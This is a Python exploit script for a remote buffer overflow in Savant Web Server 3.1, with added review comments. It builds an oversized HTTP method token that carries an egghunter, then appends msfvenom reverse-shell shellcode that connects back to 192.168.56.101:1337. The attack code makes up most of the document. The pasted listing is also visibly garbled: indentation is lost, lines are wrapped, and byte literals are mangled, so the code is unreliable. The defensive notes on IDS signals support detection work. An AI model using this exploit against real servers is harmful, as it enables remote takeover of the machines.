Authored by 0xBOF90

Savant Web Server version 3.1 remote buffer overflow exploit with egghunter shellcode.

# Exploit Title: Savant Web Server 3.1 - Remote Buffer Overflow (Egghunter)
# Date: [30/07/2023]
# Exploit Author: [0xBOF90]
# Vendor Homepage: [link]
# Version: [app version] (3.1)
# Tested on: [Windows 10]

import socket
import sys

try:
# Proof-of-concept for the Savant 3.1 overflow named in the header: build one
# oversized HTTP request whose method token is `httpMethod + inputBuffer` and
# write it to the target with a single TCP send.  Nothing is read back, so the
# script cannot tell whether the server accepted or crashed on the request.
#
# NOTE(review): as pasted this listing does not parse -- the body under `try:`
# is not indented, L21/L55 are wrapped fragments of the comments above them,
# the `egghunter` assignments are split across lines, and the byte literals
# appear mangled by the paste.  Read it as a description of the payload layout,
# not as a runnable tool.
#
# Defensive notes (what the traffic looks like on the wire): a single request
# whose method field is a few hundred bytes long instead of GET/POST, a long
# run of 0x41 padding, and the literal tag "w00tw00t" in the trailing body.
# Those are straightforward IDS/WAF signals, and a reverse proxy that rejects
# non-standard or oversized method tokens never forwards this request at all.
server = b"192.168.56.102"
# Bad characters the encoder was told to avoid (see the -b option of the
# msfvenom command below): NUL, LF, CR and '%'.
#x00x0ax0dx25
port = 80
# Total length of the overflowing method token after the 10 leading filler bytes
# and the egghunter; see the 0x41 padding computation for inputBuffer.
size = 253
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337
EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "x00x0ax0dx25"
# Encoder output as generated; it is only ever used as the tail of the request
# (after `httpEndRequest`), not inside the overflowing method token itself.
buf = b""
buf += b"xdbxc0xd9x74x24xf4xbfx57xe2x90xa0x58"
buf += b"x31xc9xb1x52x31x78x17x83xc0x04x03x2f"
buf += b"xf1x72x55x33x1dxf0x96xcbxdex95x1fx2e"
buf += b"xefx95x44x3bx40x26x0ex69x6dxcdx42x99"
buf += b"xe6xa3x4axaex4fx09xadx81x50x22x8dx80"
buf += b"xd2x39xc2x62xeaxf1x17x63x2bxefxdax31"
buf += b"xe4x7bx48xa5x81x36x51x4exd9xd7xd1xb3"
buf += b"xaaxd6xf0x62xa0x80xd2x85x65xb9x5ax9d"
buf += b"x6ax84x15x16x58x72xa4xfex90x7bx0bx3f"
buf += b"x1dx8ex55x78x9ax71x20x70xd8x0cx33x47"
buf += b"xa2xcaxb6x53x04x98x61xbfxb4x4dxf7x34"
buf += b"xbax3ax73x12xdfxbdx50x29xdbx36x57xfd"
buf += b"x6dx0cx7cxd9x36xd6x1dx78x93xb9x22x9a"
buf += b"x7cx65x87xd1x91x72xbaxb8xfdxb7xf7x42"
buf += b"xfexdfx80x31xccx40x3bxddx7cx08xe5x1a"
buf += b"x82x23x51xb4x7dxccxa2x9dxb9x98xf2xb5"
buf += b"x68xa1x98x45x94x74x0ex15x3ax27xefxc5"
buf += b"xfax97x87x0fxf5xc8xb8x30xdfx60x52xcb"
buf += b"x88x4ex0bxebx2dx27x4ex0bxabx8exc7xed"
buf += b"xd9xe0x81xa6x75x98x8bx3cxe7x65x06x39"
buf += b"x27xedxa5xbexe6x06xc3xacx9fxe6x9ex8e"
buf += b"x36xf8x34xa6xd5x6bxd3x36x93x97x4cx61"
buf += b"xf4x66x85xe7xe8xd1x3fx15xf1x84x78x9d"
buf += b"x2ex75x86x1cxa2xc1xacx0ex7axc9xe8x7a"
buf += b"xd2x9cxa6xd4x94x76x09x8ex4ex24xc3x46"
buf += b"x16x06xd4x10x17x43xa2xfcxa6x3axf3x03"
buf += b"x06xabxf3x7cx7ax4bxfbx57x3ex6bx1ex7d"
buf += b"x4bx04x87x14xf6x49x38xc3x35x74xbbxe1"
buf += b"xc5x83xa3x80xc0xc8x63x79xb9x41x06x7d"
buf += b"x6ex61x03"

# The "method" is not a real HTTP verb: seven raw bytes followed by " /".  The
# author's own comment (wrapped onto the next line by the paste) labels them as
# a short x86 stub; the server's method parser is what receives this field.
httpMethod = b"x31xC9x85xC9x0Fx84x11" + b" /" # xor ecx, ecx; test
ecx, ecx; je 0x17

# Egghunter stub placed inside the method token.  The bytes "x77x30x30x74"
# in the third chunk spell "w00t", which matches the tag prepended to
# `shellcode` below -- that is the marker it is presumably scanning for.
egghunter =
b"x33xd2x66x81xcaxffx0fx33xdbx42x53x53x52x53x53x53"
egghunter +=
b"x6ax29x58xb3xc0x64xffx13x83xc4x0cx5ax83xc4x08x3c"
egghunter +=
b"x05x74xdfxb8x77x30x30x74x8bxfaxafx75xdaxafx75xd7"
egghunter += b"xffxe7"

# Method-token layout: 10 filler bytes, the egghunter, then 0x41 padding so the
# total reaches `size`, followed by three bytes the author annotates as the
# address 0x00418674 (the overwrite target; not verifiable from this listing).
inputBuffer = b"x90"*10+egghunter
inputBuffer += b"x41" * (size-len(egghunter)-10)
inputBuffer += b"x74x86x41"#0x00418674
# Intended as the CRLF CRLF that terminates the request headers.
httpEndRequest = b"rnrn"
# Encoded payload tagged with the egghunter marker, sent after the header block.
shellcode = b"w00tw00t"+buf
# Reuses the name `buf` for the complete request: method token, header
# terminator, then the tagged payload.
buf = httpMethod + inputBuffer + httpEndRequest +shellcode
print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
# One blocking send with no response read; the socket is closed immediately.
s.send(buf)
s.close()

print("Done!")

# Only socket.error is handled; it covers connect() and send() failures alike,
# so the message below is printed for either.
except socket.error:
print("Could not connect!")